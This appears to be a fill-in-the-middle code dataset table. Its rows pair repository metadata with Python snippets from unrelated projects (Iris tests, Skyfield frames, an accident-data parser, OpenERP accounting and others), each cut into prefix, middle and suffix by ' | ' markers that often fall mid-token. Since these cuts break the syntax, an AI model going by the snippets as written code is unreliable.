repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
LukeC92/iris | lib/iris/tests/test_cube_to_pp.py | Python | lgpl-3.0 | 14,217 | 0.005135 | # (C) British Crown Copyright 2010 - 2017, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
import six
# import iris tests first so that some things can be initialised before importing anything else
import iris.tests as tests
import os
import tempfile
import cf_units
import numpy as np
import iris.coords
import iris.coord_systems
import iris.fileformats.pp
from iris.fileformats.pp import PPField3
from iris.tests import mock
import iris.tests.pp as pp
import iris.util
import iris.tests.stock as stock
def itab_callback(cube, field, filename):
cube.add_aux_coord(iris.coords.AuxCoord([field.lbrel], long_name='MOUMHeaderReleaseNumber', units='no_unit'))
cube.add_aux_coord(iris.coords.AuxCoord([field.lbexp], long_name='ExperimentNumber(ITAB)', units='no_unit'))
@tests.skip_data
class TestPPSave(tests.IrisTest, pp.PPTest):
def test_no_forecast_time(self):
cube = stock.lat_lon_cube()
coord = iris.coords.DimCoord(np.array([24], dtype=np.int64),
standard_name='time',
units='hours since epoch')
cube.add_aux_coord(coord)
self.assertCML(cube, ['cube_to_pp', 'no_forecast_time.cml'])
reference_txt_path = tests.get_result_path(('cube_to_pp', 'no_forecast_time.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cube) as temp_pp_path:
iris.save(cube, temp_pp_path)
def test_no_forecast_period(self):
cube = stock.lat_lon_cube()
# Add a bounded scalar time coord and a forecast_reference_time.
time_coord = iris.coords.DimCoord(
10.958333, standard_name='time',
units='days since 2013-05-10 12:00',
bounds=[10.916667, 11.0])
cube.add_aux_coord(time_coord)
forecast_reference_time = iris.coords.DimCoord(
2.0, standard_name='forecast_reference_time',
units='weeks since 2013-05-07')
cube.add_aux_coord(forecast_reference_time)
self.assertCML(cube, ['cube_to_pp', 'no_forecast_period.cml'])
reference_txt_path = tests.get_result_path(('cube_to_pp',
'no_forecast_period.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cube) as \
temp_pp_path:
iris.save(cube, temp_pp_path)
def test_pp_save_rules(self):
# Test pp save rules without user rules.
#read
in_filename = tests.get_data_path(('PP', 'simple_pp', 'global.pp'))
cubes = iris.load(in_filename, callback=itab_callback)
reference_txt_path = tests.get_result_path(('cube_to_pp', 'simple.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cubes) as temp_pp_path:
iris.save(cubes, temp_pp_path)
def test_pp_append_singles(self):
# Test pp append saving - single cubes.
# load 2 arrays of >2D cubes
cube = stock.simple_pp()
reference_txt_path = tests.get_result_path(('cube_to_pp', 'append_single.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=[cube, cube]) as temp_pp_path:
iris.save(cube, temp_pp_path) # Create file
iris.save(cube, temp_pp_path, append=True) # Append to file
reference_txt_path = tests.get_result_path(('cube_to_pp', 'replace_single.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cube) as temp_pp_path:
iris.save(cube, temp_pp_path) # Create file
iris.save(cube, temp_pp_path) # Replace file
def test_pp_append_lists(self):
# Test PP append saving - lists of cubes.
# For each of the first four time-steps in the 4D cube,
# pull out the bottom two levels.
cube_4d = stock.realistic_4d()
cubes = [cube_4d[i, :2, :, :] for i in range(4)]
reference_txt_path = tests.get_result_path(('cube_to_pp', 'append_multi.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cubes) as temp_pp_path:
iris.save(cubes[:2], temp_pp_path)
iris.save(cubes[2:], temp_pp_path, append=True) |
reference_txt_path = tests.get_result_path(('cube_to_pp', 'replace_multi.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cubes[2:]) as temp_pp_path:
iris.save(cubes[:2], temp_pp_path)
iris.save(cubes[2:], temp_pp_path)
def add_coords_to_cube_and_test(self, coord1, coord2):
# a wrapper for creating arbitrary 2d cross-sections and run pp-saving tests
dataarray = np.arange(16, dtype='>f4' | ).reshape(4, 4)
cm = iris.cube.Cube(data=dataarray)
cm.add_dim_coord(coord1, 0)
cm.add_dim_coord(coord2, 1)
# TODO: This is the desired line of code...
# reference_txt_path = tests.get_result_path(('cube_to_pp', '%s.%s.pp.txt' % (coord1.name(), coord2.name())))
# ...but this is required during the CF change, to maintain the original filename.
coord1_name = coord1.name().replace("air_", "")
coord2_name = coord2.name().replace("air_", "")
reference_txt_path = tests.get_result_path(('cube_to_pp', '%s.%s.pp.txt' % (coord1_name, coord2_name)))
# test with name
with self.cube_save_test(reference_txt_path, reference_cubes=cm,
field_coords=[coord1.name(), coord2.name()]) as temp_pp_path:
iris.save(cm, temp_pp_path, field_coords=[coord1.name(), coord2.name()])
# test with coord
with self.cube_save_test(reference_txt_path, reference_cubes=cm,
field_coords=[coord1, coord2]) as temp_pp_path:
iris.save(cm, temp_pp_path, field_coords=[coord1, coord2])
def test_non_standard_cross_sections(self):
#ticket #1037, the five variants being dealt with are
# 'pressure.latitude',
# 'depth.latitude',
# 'eta.latitude',
# 'pressure.time',
# 'depth.time',
f = FakePPEnvironment()
self.add_coords_to_cube_and_test(
iris.coords.DimCoord(f.z, long_name='air_pressure', units='hPa', bounds=f.z_bounds),
iris.coords.DimCoord(f.y, standard_name='latitude', units='degrees', bounds=f.y_bounds, coord_system=f.geog_cs()))
self.add_coords_to_cube_and_test(
iris.coords.DimCoord(f.z, long_name='depth', units='m', bounds=f.z_bounds),
iris.coords.DimCoord(f.y, standard_name='latitude', units='degrees', bounds=f.y_bounds, coord_system=f.geog_cs()))
self.add_coords_to_cube_and_test(
iris.coords.DimCoord(f.z, long_name='eta', units='1', bounds=f.z_bounds),
iris.coords.DimCoord(f.y, standard_name='latitude', units='degrees', bounds=f.y_bounds, coord_system=f.geog_cs()))
self.add_coords_to_cube_and_test(
iris.coords.DimCoord(f.z, long_name='air_pressure', units='hPa', bounds=f.z_bounds),
iris.coords.DimCoord(f.y, standard_name='time', units=cf_units.Unit('days since 0000-01-01 00:00:00', calendar=cf_units.CALENDAR_360_DAY), bounds=f.y_bounds))
self.add_coords_to_cube_and_test(
iris.coords.DimCoord(f.z, standard_name='depth', units='m', bounds=f.z_bounds),
|
jkonecny12/anaconda | pyanaconda/modules/storage/partitioning/interactive/interactive_interface.py | Python | gpl-2.0 | 1,424 | 0.001404 | #
# DBus interface for the interactive partitioning module
#
# Copyright (C) 2019 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it su | bject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including t | he implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from dasbus.server.interface import dbus_interface
from pyanaconda.modules.common.constants.objects import INTERACTIVE_PARTITIONING
from pyanaconda.modules.storage.partitioning.base_interface import PartitioningInterface
@dbus_interface(INTERACTIVE_PARTITIONING.interface_name)
class InteractivePartitioningInterface(PartitioningInterface):
"""DBus interface for the interactive partitioning module."""
|
skyfielders/python-skyfield | skyfield/framelib.py | Python | mit | 5,257 | 0.004967 | # -*- coding: utf-8 -*-
"""Raw transforms between coordinate frames, as NumPy matrices."""
from numpy import array
from .constants import ANGVEL, ASEC2RAD, DAY_S, tau
from .data.spice import inertial_frames as _inertial_frames
from .functions import mxm, rot_x, rot_z
def build_matrix():
# 'xi0', 'eta0', and 'da0' are ICRS frame biases in arcseconds taken
# from IERS (2003) Conventions, Chapter 5.
xi0 = -0.0166170 * ASEC2RAD
eta0 = -0.0068192 * ASEC2RAD
da0 = -0.01460 * ASEC2RAD
# Compute elements of rotation matrix.
yx = -da0
zx = xi0
xy = da0
zy = eta0
xz = -xi0
yz = -eta0
# Include second-order corrections to diagonal elements.
xx = 1.0 - 0.5 * (yx * yx + zx * zx)
yy = 1.0 - 0.5 * (yx * yx + zy * zy)
zz = 1.0 - 0.5 * (zy * zy + zx * zx)
return array(((xx, xy, xz), (yx, yy, yz), (zx, zy, zz)))
ICRS_to_J2000 = build_matrix()
del build_matrix
_identity = array([(1,0,0), (0,1,0), (0,0,1)])
class ICRS(object):
"""The International Coordinate Reference System (ICRS).
The ICRS is a permanent reference frame which has replaced J2000,
with which its axes agree to within 0.02 arcseconds (closer than the
precision of J2000 itself). The ICRS also supersedes older
equinox-based systems like B1900 and B1950.
"""
@staticmethod
def rotation_at(t):
return _identity
def build_ecliptic_matrix(t):
# Build the matrix to rotate an ICRF vector into ecliptic coordinates.
_, d_eps = t._nutation_angles_radians
true_obliquity = t._mean_obliquity_radians + d_eps
return mxm(rot_x(- true_obliquity), t.M)
class true_equator_and_equinox_of_date(object):
"""The dynamical frame of the Earth’s true equator and equinox of date.
This is supplied as an explicit reference frame in case you want
|xyz| coordinates; if you want angles, it’s better to use the
standard position method ``radec(epoch='date')`` since that will
return the conventional units of hours-of-right-ascension instead of
the degrees-of-longitude that ``frame_latlon()`` would return.
This reference frame combines current theories of the Earth’s
precession and nutation with a small offset between the ITRS and
J2000 systems to produce right ascension and declination for a given
date relative to the Earth’s axis and equator of rotation.
"""
@staticmethod
def rotation_at(t):
return t.M
true_equator_and_equinox_of_date = true_equator_and_equinox_of_date()
_itrs_angvel_matrix = array((
(0.0, DAY_S * ANGVEL, 0.0),
(-DAY_S * ANGVEL, 0.0, 0.0),
(0.0, 0.0, 0.0),
))
class tirs(object):
"""The Terrestrial Intermediate Reference System (TIRS).
Coordinates in this Earth-centered Earth-fixed (ECEF) system are
measured from the axis and equator of the Earth’s rotation, ignoring
the few tenths of an arcsecond by which the Earth’s actual crust and
continents might be askance from the axis. (More precisely: like
the ITRS this frame accounts for precession and nutation, but
neglects polar motion and the TIO locator.)
"""
@staticmethod
def rotation_at(t):
return mxm(rot_z(-t.gast * tau / 24.0), t.M)
@staticmethod
def _dRdt_times_RT_at(t):
# TODO: taking the derivative of the instantaneous angular
# velocity provides a more accurate transform.
return _itrs_angvel_matrix
tirs = tirs()
class itrs(object):
"""The International Terrestrial Reference System (ITRS).
This is the IAU standard for an Earth-centered Earth-fixed (ECEF)
coordinate system, anchored to the Earth’s crust and continents.
This reference frame combines three other reference frames: the
Earth’s true equator and equinox of date, the Earth’ | s rotation with
respect | to the stars, and (if your ``Timescale`` has polar offsets
loaded) the polar wobble of the crust with respect to the Earth’s
pole of rotation.
.. versionadded:: 1.34
"""
@staticmethod
def rotation_at(t):
R = mxm(rot_z(-t.gast * tau / 24.0), t.M)
if t.ts.polar_motion_table is not None:
R = mxm(t.polar_motion_matrix(), R)
return R
@staticmethod
def _dRdt_times_RT_at(t):
# TODO: taking the derivative of the instantaneous angular
# velocity provides a more accurate transform.
return _itrs_angvel_matrix
itrs = itrs()
class ecliptic_frame(object):
"""Reference frame of the true ecliptic and equinox of date."""
def rotation_at(self, t):
return build_ecliptic_matrix(t)
ecliptic_frame = ecliptic_frame()
class InertialFrame(object):
def __init__(self, doc, matrix):
self.__doc__ = doc
self._matrix = matrix
def rotation_at(self, t):
return self._matrix
equatorial_B1950_frame = InertialFrame(
'Reference frame of the Earth’s mean equator and equinox at B1950.',
_inertial_frames['B1950'],
)
ecliptic_J2000_frame = InertialFrame(
'Reference frame of the true ecliptic and equinox at J2000.',
_inertial_frames['ECLIPJ2000'],
)
galactic_frame = InertialFrame(
'Galactic System II reference frame.',
_inertial_frames['GALACTIC'],
)
|
hongta/practice-python | sorting/bucket_sort.py | Python | mit | 416 | 0.012019 | #!/usr/bin/ | env python
# -*- coding: utf-8 -*-
from insertion_sort import insertion_sort
def bucket_sort(a):
"""
0.0 <= a[i] <= 1
"""
b = [[] for _ in a]
n = len(a)
for v in a:
b[int(n*v)].append(v)
a = []
for i in range(len(b)):
a.extend(insertion_sort(b[i]))
return a
if __name__ == '__main__':
d=[0.7, 0.23, 0.03, 0.92,0.21]
bucket_so | rt(d)
|
enthought/etsproxy | enthought/envisage/ui/single_project/action/configure_action.py | Python | bsd-3-clause | 119 | 0 | # proxy module
from __future__ import absolute_import
from envisage.ui.single_project.a | ction.config | ure_action import *
|
reviewboard/reviewboard | reviewboard/diffviewer/evolutions/add_diff_hash.py | Python | mit | 542 | 0 | from django_evolution.mutations import AddField, RenameField
from django.db import models
MUTATIONS = [
RenameField('FileDiff', 'diff', 'diff64', db_column='diff_base64'),
RenameField('FileDiff', 'parent_diff', 'parent_diff64',
db_column='parent_diff_base64'),
AddField('FileDiff', 'diff | _hash', models.ForeignKey, null=True,
related_model='diffviewer.FileDiffData'),
AddField('FileDiff', 'parent_diff_hash', models.ForeignKey, null=True,
| related_model='diffviewer.FileDiffData'),
]
|
sigmunau/nav | python/nav/web/navlets/error.py | Python | gpl-2.0 | 900 | 0 | #
# Copyright (C) 2014 UNINETT AS
#
# This file is part of Network Administration Visualized (NAV).
#
# NAV is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied | warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details. You should have received a copy of t | he GNU General Public
# License along with NAV. If not, see <http://www.gnu.org/licenses/>.
#
"""Replacement widget for when we can not find the widget class"""
from . import Navlet
class ErrorWidget(Navlet):
title = "Error"
description = "Jau"
can_be_added = False
def get_template_basename(self):
return "error"
|
tartopum/MPF | setup.py | Python | mit | 1,662 | 0.007822 | import os
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
import mpf
# Test
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errcode = pytest.main(self.test_args)
sys.exit(errcode)
# README
readme = ""
with open("README.md", "r") as f:
readme = f.read()
# Packages
packages = [
"mpf"
]
# Requirements
def strip_comments(l):
return l.split("#", 1)[0].strip()
def reqs(*f):
return list(filter(None, [strip_comments(l) for l in open(os.path.join(os.getcwd(), *f)).readlines()]))
requirements = reqs("requirements.txt")
test_requirements = reqs("requirements-dev.txt")
test_requirements = requirements + test_requirements[1:]
setup(
name="mpf",
version=mpf.__version__,
description="",
long_description=readme,
author="Vayel",
author_email="vincent.lefoulon@free.fr",
url="https://github.com/Vayel/MPF",
packages=packages,
package_dir={"mpf": "mpf"},
include_package | _data=True,
i | nstall_requires=requirements,
license="MIT",
zip_safe=False,
keywords="mpf",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.4"
],
cmdclass={"test": PyTest},
tests_require=test_requirements
)
|
supriyantomaftuh/python-publisher | pubsubhubbub_publish_test.py | Python | apache-2.0 | 4,205 | 0.005945 | #!/usr/bin/env python
#
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for the pubsubhubbub_publish module."""
__author__ = 'bslatkin@gmail.com (Brett Slatkin)'
import BaseHTTPServer
import urllib
import unittest
import threading
import pubsubhubbub_publish
REQUESTS = 0
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_POST(self):
global REQUESTS
print 'Accessed', self.path
REQUESTS += 1
length = int(self.headers.get('content-length', 0))
if not length:
return self.send_error(500)
body = self.rfile.read(length)
if self.path == '/single':
if body != urllib.urlencode(
{'hub.url': 'http://example.com/feed', 'hub.mode': 'publish'}):
self.send_error(500)
self.wfile.write('Bad body. Found:')
self.wfile.write(body)
else:
self.send_response(204)
elif self.path == '/multiple':
if body != urllib.urlencode(
{'hub.url': ['http://example.com/feed',
'http://example.com/feed2',
'http://example.com/feed3'],
'hub.mode': 'publish'}, doseq=True):
self.send_error(500)
self.wfile.write('Bad body. Found:')
self.wfile.write(body)
else:
self.send_response(204)
elif self.path == '/batch':
self.send_response(204)
elif self.path == '/fail':
self.send_error(400)
self.wfile.write('bad argument')
else:
self.send_error(404)
class PublishTest(unittest.TestCase):
def setUp(self):
global REQUESTS
REQUESTS = 0
self.server = BaseHTTPServer.HTTPServer(('', 0), RequestHandler)
t = threading.Thread(target=self.server.serve_forever)
t.setDaemon(True)
t.start()
self.hub = 'http://%s:%d' % (
self.server.server_name, self.server.server_port)
self.feed = 'http://example.com/feed'
self.feed2 = 'http://example.com/feed2'
self.feed3 = 'http://example.com/feed3'
def testSingle(self):
pubsubhubbub_publish.publish(self.hub + '/single', self.feed)
self.assertEquals(1, REQUESTS)
def testMultiple(self):
pubsubhubbub_publish.publish(self.hub + '/multiple',
self.feed, self.feed2, self.feed3)
def testList(self):
pubsubhubbub_publish.publish(self.hub + '/multiple',
[self.feed, self.feed2, self.feed3])
def testIterable(self):
pubsubhubbub_publish.publish(self.hub + '/multiple',
iter([self.feed, self.feed2, self.feed3]))
def testBatchSizeLimit(self):
old = pubsubhubbub_publish.URL_BATCH_SIZE
try:
pubsubhubbub_publish.URL_BATCH_SIZE = 2
pubsubhubbub_publish.publish(self.hub + '/batch',
[self.feed, self.feed2, self.feed3])
finally:
pubsubhubbub_publish.URL_BATCH_SIZE = old
self.assertEquals(2, REQUESTS)
def testBadHubHostname(self):
self.assertRaises(
pubsubhubbub_publis | h.PublishError,
pubsubhubbub_publish.publish,
'http://asdf.does.not.resolve', self.feed)
def testBadArgument(self):
self.assertRaises(
pubsubhubbub_publish.PublishError,
pubsubhubbub_publish.publish,
self.hub + '/fail', self.feed)
def testBadHubUrl(self):
self.assertRaises(
pubsubhubbub_publish.PublishError,
pubsubhubbub_publish.publish,
'not://a.url.is.this', self | .feed)
def testNotFound(self):
self.assertRaises(
pubsubhubbub_publish.PublishError,
pubsubhubbub_publish.publish,
self.hub + '/unknown', self.feed)
if __name__ == '__main__':
unittest.main()
|
Cataloniacoin/CataloniacoinS | contrib/wallettools/walletunlock.py | Python | mit | 158 | 0 | from | jsonrpc import ServiceProxy
access = ServiceProxy("http://127.0.0.1:9678")
pwd = raw_input("Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60 | )
|
lopiola/integracja_wypadki | scripts/gb_accident_parser.py | Python | mit | 7,122 | 0.001545 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Parsing accident CSV files for Great Britain data and putting them into DB
"""
import csv
import sys
import db_api.accident
from parsing.common import get_timestamp, translate_field, to_float, to_int, map_from_dictionary, mph_to_kmph
from parsing.gb_common import get_acc_id, GB_IDS_FILE, get_gb_ids
import cPickle as pickle
def is_fatal(accident_data):
if int(accident_data['Accident_Severity']) == 1:
return True
return False
def get_acc_datetime(date, time):
"""
Builds datetime in a form of dictionary based on date and time
of accident.
:param date - Date in format "DD/MM/YYYY"
:param time - Time in format "HH:mm"
"""
datetime = {}
# Date format is "DD/MM/YYYY"
day = int(date[:2])
month = int(date[3:5])
year = int(date[-4:])
datetime['year'] = year
datetime['month'] = month
datetime['day'] = day
# Time format is "HH:mm"
try:
hour = int(time[:2])
minute = int(time[-2:])
datetime['hour'] = hour
datetime['minute'] = minute
except ValueError:
return None
return datetime
def get_timestamp_from_date_time(date, time):
datetime = get_acc_datetime(date, time)
if not datetime:
return None
return get_timestamp(**datetime)
"""
Mapping dictionaries.
"""
snow_dictionary = {
'1': 'NO',
'2': 'NO',
'3': 'YES',
'4': 'NO',
'5': 'NO',
'6': 'YES',
'7': 'NO',
'8': 'NO',
'-1': 'UNKNOWN',
}
rain_dictionary = {
'1': 'NO',
'2': 'YES',
'3': 'NO',
'4': 'NO',
'5': 'YES',
'6': 'NO',
'7': 'NO',
'8': 'NO',
'-1': 'UNKNOWN',
}
wind_dictionary = {
'1': 'NO',
'2': 'NO',
'3': 'NO',
'4': 'YES',
'5': 'YES',
'6': 'YES',
'7': 'NO',
'8': 'NO',
'-1': 'UNKNOWN',
}
fog_dictionary = {
'1': 'NO',
'2': 'NO',
'3': 'NO',
'4': 'NO',
'5': 'NO',
'6': 'NO',
'7': 'YES',
'8': 'NO',
'-1': 'UNKNOWN',
}
road_class_dictionary = {
'1': 'MOTORWAY',
'2': 'MOTORWAY',
'3': 'PRINCIPAL',
'4': 'MAJOR',
'5': 'MINOR',
'6': 'UNCLASSIFIED',
'-1': 'UNKNOWN',
}
junction_dictionary = {
'0': 'NON_JUNCTION',
'1': 'INTERSECTION',
'2': 'INTERSECTION',
'3': 'INTERSECTION',
'4': 'INTERSECTION',
'5': 'RAMP',
'6': 'INTERSECTION',
'7': 'INTERSECTION',
'8': 'DRIVEWAY',
'9': 'INTERSECTION',
'-1': 'UNKNOWN',
}
surface_dictionary = {
'1': 'DRY',
'2': 'WET',
'3': 'SNOW',
'4': 'ICE',
'5': 'FLOOD',
'6': 'OTHER',
'7': 'OTHER',
'-1': 'UNKNOWN',
}
lighting_dictionary = {
'1': 'DAYLIGHT',
'4': 'DARK_LIGHTED',
'5': 'DARK',
'6': 'DARK',
'7': 'DARK',
'-1': 'UNKNOWN',
}
junction_control_dictionary = {
'0': 'YIELD_OR_NONE',
'1': 'AUTH_PERSON',
'2': 'TRAFFIC_SIGNAL',
'3': 'STOP_SIGN',
'4': 'YIELD_OR_NONE',
'-1': 'UNKNOWN',
}
def is_signal_malfunction(special_conditions):
return special_conditions in ['1', '2']
def map_junction_control(junction_control, special_conditions):
if is_signal_malfunction(special_conditions):
return 'SIGNAL_MALF'
else:
return junction_control_dictionary[junction_control]
"""
A mapping from labels in csv file to a tuple of new label for
database and function for transforming old value into new one.
Transforming functions can have arbitrarily many arguments
that are passed in as kwargs.
"""
translator_map = {
'\xef\xbb\xbfAccident_Index': [('id', get_acc_id)],
'Longitude': [('longitude', to_float)],
'Latitude': [('latitude', to_float)],
'Date': [('timestamp', get_timestamp_from_date_time)],
'Day_of_Week': [('day_of_week', to_float)],
'Number_of_Casualties': [('persons_count', to_int)],
'Number_of_Vehicles': [('vehicles_count', to_int)],
'Speed_limit': [('speed_limit', lambda value: mph_to_kmph(int(value)))],
'Weather_Conditions': [
('snow', map_from_dictionary(snow_dictionary)),
('rain', map_from_dictionary(rain_dictionary)),
('fog', map_from_dictionary(fog_dictionary)),
('wind', map_from_dictionary(wind_dictionary))
],
'1st_Road_Class': [('road_class', map_from_dictionary(road_class_dictionary))],
'Junction_Detail': [('relation_to_junction', map_from_dictionary(junction_dictionary))],
'Road_Surface_Conditions': [('surface_cond', map_from_dictionary(surface_dictionary))],
'Light_Conditions': [('lighting', map_from_dictionary(lighting_dictionary))],
'Junction_Control': [('traffic_control', map_junction_control)]
}
def get_kwargs(accident_data, field):
"""
Build kwargs from accident data for a specific field.
Default is one pair: value = field_value_as_string
"""
if field == '\xef\xbb\xbfAccident_Index':
return {'acc_index': accident_data[field]}
if field == 'Date':
return {'date': accident_data['Date'], 'time': accident_data['Time']}
if field == 'Junc | tion_Control':
return {'junction_control': accident_data[field], 'special_conditions': accident_data['Special_Conditions_at_Site']}
return {'value': accident_data[field]}
def update_ids(accidents):
new_ids = {}
for accident in accident | s:
new_ids[accident['id']] = True
ids = get_gb_ids()
ids.update(new_ids)
with open(GB_IDS_FILE, "w+") as pickle_file:
pickle.dump(ids, pickle_file)
if __name__ == '__main__':
if len(sys.argv) != 2:
print('Usage: {0} <csv_file>'.format(sys.argv[0]))
exit(1)
with open(sys.argv[1], 'rt') as csv_file:
reader = csv.DictReader(csv_file)
fields = reader.fieldnames
accidents = []
for accident_data in reader:
if is_fatal(accident_data):
accident = {'country': 'GB'}
for field in fields:
kwargs = get_kwargs(accident_data, field)
try:
label_list = translate_field(field, translator_map, **kwargs)
for (label, value) in label_list:
accident[label] = value
except ValueError:
# We do not want to map this field
pass
# TODO: Change this and count lat/long from osgr
# For now setting to incorrect value (lat/long) can't be more than 180
if 'latitude' not in accident:
accident['latitude'] = 200.0
accident['longitude'] = 200.0
if accident['timestamp']:
accident['fatalities_count'] = 0
accidents.append(db_api.accident.new_from_dict(accident))
# print accident
db_api.accident.insert(accidents)
update_ids(accidents)
|
miracle2k/pysieved | plugins/accept.py | Python | gpl-2.0 | 2,161 | 0.007867 | #! /usr/bin/py | thon
## pysieved - Python managesieve server
## Copyright (C) 2007 Neale Pickett
## This program is free software; you can | redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or (at
## your option) any later version.
## This program is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
## USA
import __init__
import warnings
class ScriptStorage(__init__.ScriptStorage):
def __init__(self):
self.scripts = {}
self.active = None
def __setitem__(self, k, v):
self.scripts[k] = v
def __getitem__(self, k):
return self.scripts[k]
def __delitem__(self, k):
if self.active == k:
raise ValueError('Script is active')
del self.scripts[k]
def __iter__(self):
for k in self.scripts:
yield k
def has_key(self, k):
return self.scripts.has_key(k)
def is_active(self, k):
return self.active == k
def set_active(self, k):
if k != None and k not in self.scripts:
raise KeyError('Unknown script')
self.active = k
class PysievedPlugin(__init__.PysievedPlugin):
def init(self, config):
self.warn = config.getboolean('Accept', 'warn', True)
def auth(self, params):
if self.warn:
warnings.warn('The "accept" module is for testing only!')
return True
def lookup(self, params):
if self.warn:
warnings.warn('The "accept" module is for testing only!')
return '/tmp'
def create_storage(self, params):
if self.warn:
warnings.warn('The "accept" module is for testing only!')
return ScriptStorage()
|
camptocamp/ngo-addons-backport | addons/account/account.py | Python | agpl-3.0 | 191,194 | 0.007307 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from datetime import datetime
from dateutil.relativedelta import relativedelta
from operator import itemgetter
import time
import openerp
from openerp import SUPERUSER_ID
from openerp import pooler, tools
from openerp.osv import fields, osv, expression
from openerp.tools.translate import _
from openerp.tools.float_utils import float_round as round
import openerp.addons.decimal_precision as dp
_logger = logging.getLogger(__name__)
def check_cycle(self, cr, uid, ids, context=None):
""" climbs the ``self._table.parent_id`` chains for 100 levels or
until it can't find any more parent(s)
Returns true if it runs out of parents (no cycle), false if
it can recurse 100 times without ending all chains
"""
level = 100
while len(ids):
cr.execute('SELECT DISTINCT parent_id '\
'FROM '+self._table+' '\
'WHERE id IN %s '\
'AND parent_id IS NOT NULL',(tuple(ids),))
ids = map(itemgetter(0), cr.fetchall())
if not level:
return False
level -= 1
return True
class account_payment_term(osv.osv):
    """Payment term: an ordered set of lines describing when and how much
    of an invoice total becomes due (e.g. 30% now, balance in 30 days)."""
    _name = "account.payment.term"
    _description = "Payment Term"
    _columns = {
        'name': fields.char('Payment Term', size=64, translate=True, required=True),
        'active': fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the payment term without removing it."),
        'note': fields.text('Description', translate=True),
        # One line per due-date rule; see account.payment.term.line.
        'line_ids': fields.one2many('account.payment.term.line', 'payment_id', 'Terms'),
    }
    _defaults = {
        'active': 1,
    }
    _order = "name"
    def compute(self, cr, uid, id, value, date_ref=False, context=None):
        """Split ``value`` over the term lines into (due_date, amount) pairs.

        :param id: id of the payment term to apply (a single id, not a list)
        :param value: total amount to distribute
        :param date_ref: reference date string '%Y-%m-%d'; defaults to today
        :return: list of ('%Y-%m-%d', amount) tuples
        """
        if not date_ref:
            date_ref = datetime.now().strftime('%Y-%m-%d')
        pt = self.browse(cr, uid, id, context=context)
        amount = value
        result = []
        # Rounding precision configured for the 'Account' decimal accuracy.
        obj_precision = self.pool.get('decimal.precision')
        prec = obj_precision.precision_get(cr, uid, 'Account')
        for line in pt.line_ids:
            if line.value == 'fixed':
                amt = round(line.value_amount, prec)
            elif line.value == 'procent':
                # value_amount is a 0-1 ratio (enforced by the constraint on
                # account.payment.term.line), not a percentage.
                amt = round(value * line.value_amount, prec)
            elif line.value == 'balance':
                amt = round(amount, prec)
